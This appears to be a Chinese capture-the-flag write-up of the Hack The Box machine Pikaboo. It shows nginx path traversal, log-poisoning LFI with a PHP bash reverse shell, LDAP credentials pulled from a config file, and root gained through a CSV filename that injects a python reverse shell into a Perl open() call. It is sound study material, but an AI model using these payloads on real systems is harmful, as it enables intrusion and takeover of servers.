基本信息

端口扫描

21,22,80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV 10.10.10.249

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 14:00 CST
Nmap scan report for 10.10.10.249
Host is up (0.070s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
|   256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_  256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.47 seconds

80

目录扫描

admin点进去,根据信息发现是81端口,nginx反代:

nginx配置不当可以进行目录遍历:

利用这个方式扫目录:

1
2
3
4
5
6
7
8
gobuster dir -u http://10.10.10.249/admin../ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/.htpasswd            (Status: 403) [Size: 274]
/.hta                 (Status: 403) [Size: 274]
/.htaccess            (Status: 403) [Size: 274]
/admin                (Status: 401) [Size: 456]
/javascript           (Status: 301) [Size: 314] [--> http://127.0.0.1:81/javascript/]
/server-status        (Status: 200) [Size: 3897]

admin_staging

根据status里得到的信息,同样方式访问admin_staging:

LFI

根据页面参数格式,可能存在lfi,fuzz后发现可以包含几个日志文件:

LFI to RCE

根据已有条件,搜到:

ftp连接时注入php代码到日志中,web包含ftp日志,触发执行php代码:

1
2
3
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.6/4444 0>&1'"); ?>

http://10.10.10.249/admin../admin_staging/index.php?page=%2fvar%2flog%2fvsftpd%2elog

user flag

www-data用户可以去读取pwnmeow用户目录user.txt:

信息

ldap

查看端口可以发现本地389,LDAP:

config

/opt/pokeapi/config/settings.py中可以得到ldap密码:

1
2
3
4
5
6
7
8
9
10
11
12
DATABASES = {
    "ldap": {
        "ENGINE": "ldapdb.backends.ldap",
        "NAME": "ldap:///",
        "USER": "cn=binduser,ou=users,dc=pikaboo,dc=htb",
        "PASSWORD": "J~42%W?PFHl]g",
    },
    "default": {
        "ENGINE": "django.db.backends.sqlite3",
        "NAME": "/opt/pokeapi/db.sqlite3",
    }
}

LDAP

使用得到认证信息可以进行ldap查询,获取其他信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ldapsearch -D "cn=binduser,ou=users,dc=pikaboo,dc=htb" -w 'J~42%W?PFHl]g' -b 'dc=pikaboo,dc=htb' -LLL -h 127.0.0.1 -p 389 -s sub "(objectClass=*)"

dn: uid=pwnmeow,ou=users,dc=ftp,dc=pikaboo,dc=htb
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
uid: pwnmeow
cn: Pwn
sn: Meow
loginShell: /bin/bash
uidNumber: 10000
gidNumber: 10000
homeDirectory: /home/pwnmeow
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==

pwnmeow

ldap中得到pwnmeow用户密码,不能ssh,可以FTP:

1
2
echo X0cwdFQ0X0M0dGNIXyczbV80bEwhXw== | base64 -d
_G0tT4_C4tcH_'3m_4lL!_

提权信息

查看crontab可以发现root定期对ftp下的目录进行csvupdate:

/usr/local/bin/csvupdate

查看这个文件,发现是一个perl脚本,内部使用open打开csv文件,根据相关信息,搜到:

所以我们可以生成一个文件名是恶意代码的csv文件,使其执行

exploit & root flag

生成个恶意文件名的csv,ftp上传,等待执行,得到root shell:

1
2
3
|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.6\", 4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv

touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.6\", 4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"

参考资料